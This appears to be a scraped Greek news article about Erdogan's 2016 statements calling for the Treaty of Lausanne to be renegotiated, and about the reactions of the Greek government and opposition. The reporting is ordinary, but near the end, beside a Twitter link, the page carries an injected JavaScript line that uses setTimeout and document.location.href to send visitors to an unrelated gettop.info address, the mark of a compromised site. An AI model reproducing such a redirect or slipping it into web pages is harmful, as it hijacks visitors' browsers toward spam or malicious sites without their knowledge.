Ο Ερντογάν αμφισβητεί ευθέως τη Συνθήκη της Λωζάννης -«Η κυβέρνηση δεν σχολιάζει δημοσιεύματα» λέει ο Τζανακόπουλος

0
13

 

Σάλο έχει προκαλέσει για άλλη μια φορά ο Τούρκος πρόεδρος Ταγίπ Ερντογάν, καθώς για πρώτη φορά θέτει θέμα επαναδιαπραγμάτευσης της Συνθήκης της Λωζάννης.

Ειδικότερα, είπε πως η Συνθήκη της Λωζάνης δεν είναι ούτε ιερό κείμενο, ούτε ιερό βιβλίο, οπότε το περιεχόμενό της πρέπει να ξανασυζητηθεί.

Η φιλοκυβερνητική ενημερωτική ιστοσελίδα A Haber δημοσιεύει τις νέες δηλώσεις του Τούρκου Προέδρου Ταγίπ Ερντογάν (http://www.ahaber.com.tr/gundem/2016/11/22/cumhurbaskani-erdogan-lozan-kutsal-bir-metin-asla-degildir). «Τι θα συμβεί αν η Τουρκία παραμείνει απομακρυσμένη από την Συρία και τις άλλες περιοχές;», αναρωτιέται ο κ.Ερντογάν, ο οποίος προσθέτει: «Σε αυτή την περίπτωση αυτές οι περιοχές θα είχαν γαλήνη και ασφάλεια;»

Εν συνεχεία, ο Ερντογάν τονίζει: «Οι κανόνες που έθεσαν οι νικήτριες δυνάμεις του Α΄ Παγκοσμίου Πολέμου δεν έδιναν στην Τουρκία το δικαίωμα της επιβίωσης. Με την Συνθήκη των Σεβρών η Τουρκία διαμελιζόταν σε 7-8 κομμάτια. Η Τουρκία δεν αποδέχθηκε αυτή την διχοτόμηση και σχημάτισε τα σημερινά σύνορα. Η συζήτηση για την Συνθήκη της Λωζάνης ξεκινά από αυτό το σημείο».

Συνεχίζοντας την τοποθέτηση του ανέφερε: «Φυσικά αντιμετωπίζουμε με ευχαρίστηση ότι κερδίσαμε στην Συνθήκη της Λωζάννης. (Όμως), η Λωζάννη δεν είναι μια συνθήκη που δεν μπορεί να συζητηθεί. Σε καμία περίπτωση δεν είναι ένα ιερό κείμενο. Και φυσικά θα την συζητήσουμε».

Επίσης είπε πως: «Θα εργαστούμε για να εξασφαλίσουμε κάτι καλύτερο (σ.σ. ‘Daha iyisine sahip olmak için çalışacağız’ στα τούρκικα). Ακόμη επιχειρούν να μας εγκλωβίσουν στην Λωζάννη. Να μας συγχωρέσουν. Έχω δικαίωμα λόγου. Θα καταβάλλουμε κάθε είδους προσπάθεια για να εξασφαλίσουμε τους στόχους του 2023. Γνωρίζουμε ότι θα πατήσουμε το πόδι πολλών πλευρών. Θα αγγίξουμε πολλά συμφέροντα. Αυτό θα το πράξουμε μαζί σε κάθε περίπτωση. Είμαστε αποφασισμένοι να οδηγήσουμε την Τουρκία πιο πέρα».

Στην ενημέρωση των πολιτικών συντακτών, ο κυβερνητικός εκπρόσωπος αρνήθηκε να σχολιάσει τη δήλωση Ερντογάν με την οποία αμφισβητεί για μια ακόμη φορά τη Συνθήκη της Λωζάννης λέγοντας: «Δεν υπάρχει δήλωση παρά μόνο ένα μόνο δημοσίευμα και η κυβέρνηση δε σχολιάζει δημοσιεύματα».

Οι νέες προκλητικές αναφορές του Ερντογάν, που πλέον φτάνει στο σημείο να μιλά για επαναδιαπραγμάτευση της Συνθήκης της Λωζάννης προστίθενται στην αλυσίδα των δηλώσεων και δημόσιων τοποθετήσεων που έχει κάνει το τελευταίο διάστημα ο Τούρκος Πρόεδρος, μιλώντας για «τα σύνορα της καρδιάς» των Τούρκων και τις προτροπές του προς την τουρκική νεολαία να ερευνήσει το ζήτημα .

Χαρακτηριστικά ήταν τα όσα είχε πει πριν από περίπου ένα μήνα απευθυνόμενος σε κοινοτάρχες στην Άγκυρα, όπου είχε αμφισβητήσει ευθέως τη Συνθήκη και τις επιταγές της.

«Φέραμε στην επικαιρότητα τη Λωζάννη και το Εθνικό Συμβόλαιο», είχε πει τότε και είχε προσθέσει: «Φαίνεται πως κάποιες αλήθειες μας τις έμαθαν λάθος. Θέλω από τη νεολαία μας να εξετάσει τη Λωζάννη και ας ενοχληθούν κάποιοι. Τα λάθη αυτά πρέπει να τα ξέρουμε».

Κικίλιας: Μόνο ο κυβερνητικός εκπρόσωπος δεν άκουσε τις δηλώσεις Ερντογάν
Μόνο ο κυβερνητικός εκπρόσωπος «δεν είδε, δεν άκουσε, δεν διάβασε, τις δηλώσεις Ερντογάν», σχολίασε μέσω του λογαριασμού του στο Twitter ο νέος εκπρόσωπος Τύπου της Νέας Δημοκρατίας Βασίλης Κικίλιας.
«Τουλάχιστον στα εθνικά θέματα σοβαρευτείτε», πρόσθεσε ο κ. Κικίλιας.

https://twitter.com/Vkikilias/status/801146804104548352 setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here